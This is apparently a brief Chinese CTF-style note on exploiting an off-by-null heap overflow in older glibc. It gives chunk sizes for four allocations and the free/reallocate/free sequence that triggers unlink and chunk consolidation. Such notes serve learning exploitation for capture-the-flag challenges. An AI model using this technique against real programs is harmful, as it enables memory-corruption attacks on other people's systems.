低版本的offbynull

构造三个堆块即可打

注意构造的堆块A不要放入fastbin范围内，也就是申请的时候大于等于0x80

堆块B随意都可以

堆块C也要挺大的

给定一个组合吧awa

add(0x80, b"\x0A"*10) add(0x38, b"\x0B"*10) add(0xf8, b"\x0C"*10) add(0x100, b"\x0D"*10)

D是用来放置被main合并的

步骤:

delete(A)

delete(B)

create(B)

→此处造成offbynull

然后delete(C)触发unlink